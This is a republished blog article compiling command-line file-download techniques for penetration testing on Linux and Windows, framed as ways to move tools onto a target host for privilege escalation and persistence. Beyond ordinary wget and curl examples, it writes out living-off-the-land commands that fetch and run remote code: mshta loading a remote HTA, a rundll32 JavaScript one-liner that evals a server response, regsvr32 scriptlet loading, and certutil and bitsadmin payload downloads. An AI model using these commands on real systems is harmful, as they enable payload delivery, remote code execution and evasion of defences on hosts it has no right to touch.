BestHub
Sign in
Information Security 13 min read

File Transfer Techniques for Penetration Testing: Linux and Windows Download Commands

This article compiles common file download commands and tools used in penetration testing for both Linux and Windows environments, covering utilities such as wget, curl, axel, aria2, PowerShell, certutil, bitsadmin, and others, with example syntax for direct, background, and resumable transfers.

Python Programming Learning Circle
Python Programming Learning Circle
Python Programming Learning Circle
File Transfer Techniques for Penetration Testing: Linux and Windows Download Commands

During penetration testing, transferring files to a target host is often required for privilege escalation or maintaining control; when direct transfer is not possible but the host has network connectivity, downloading files from the internet can be used.

Linux download utilities

Wget

Wget supports resume, multiple files, bandwidth control, etc.

wget http://www.sample-videos.com/video/mp4/big.mp4
wget -b http://www.sample-videos.com/video/mp4/big.mp4
wget -c http://www.sample-videos.com/video/mp4/big.mp4
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address

Curl

Curl is a versatile downloader that can upload or download files, resume downloads, and supports many protocols.

curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4

Axel

Axel is a lightweight accelerator that opens multiple HTTP connections to download file fragments in parallel.

apt-get install axel
axel http://www.sample-videos.com/video/mp4/big.mp4

Aria2

Aria2 is an open‑source command‑line download accelerator supporting multiple connections and maximum bandwidth usage.

apt-get install aria2
aria2c http://www.sample-videos.com/video/mp4/big.mp4

Perl

Perl can download files using LWP::Simple.

#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");

Python

Python can download a file with urllib2.

#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()

Ruby

Ruby can download a file using Net::HTTP.

#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file| file.write(r.body) }
}

PHP

PHP can download a file with file() and fwrite.

#!/usr/bin/php
<?php
$data = @file("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, 'w');
fwrite($fh, $data[0]);
fclose($fh);
?>

FTP (bash script)

A non‑interactive FTP script can download a file.

ftp 127.0.0.1
username
password
get file
exit

Netcat

Netcat can be used to transfer a file over a listening port.

cat file | nc -l 1234
nc host_ip 1234 > file

Windows download techniques

PowerShell

PowerShell can download a file using System.Net.WebClient.

$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file", "C:\%homepath%\file")

IPC$ share

copy \\192.168.3.1\c$\test.exe E:\file
cmd.exe /k <webdavserver\folder\batchfile.txt

Certutil

Certutil can download files and split them from the cache.

certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe
certutil -urlcache -split -f http://192.168.3.1/test.exe delete

Visual Basic (VBScript)

Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile " C:\%homepath%\file", 2
end with

Tftp

tftp -i IP_ADDRESS PUT C:\%homepath%\file remote_path
tftp -i IP_ADDRESS GET C:\%homepath%\file local_path

Bitsadmin

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:\phpstudy_pro\WWW\b.ps1"
bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt

Mshta

Mshta can execute a remote HTA file.

mshta http://192.168.3.1/run.hta

Rundll32

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);

Regsvr32

regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll

Windows Share

net use x: \\127.0.0.1\share /user:example.com\userID myPassword

Format conversion (Nishang)

PS > .\ExetoText.ps1 evil.exe evil.txt
PS > .\TexttoExe.ps1 evil.text evil.exe

Other utilities

Examples include msxsl.exe, pubprn.vbs, esentutl.exe, extrac32.exe, desktopimgdownldr.exe, etc., which can be abused to download files.

Original source: https://www.cnblogs.com/-mo-/p/12109717.html

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

LinuxFile Downloadcommand-lineWindowspenetration testingsecurity toolsnetwork exploitation
Python Programming Learning Circle
Written by

Python Programming Learning Circle

A global community of Chinese Python developers offering technical articles, columns, original video tutorials, and problem sets. Topics include web full‑stack development, web scraping, data analysis, natural language processing, image processing, machine learning, automated testing, DevOps automation, and big data.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment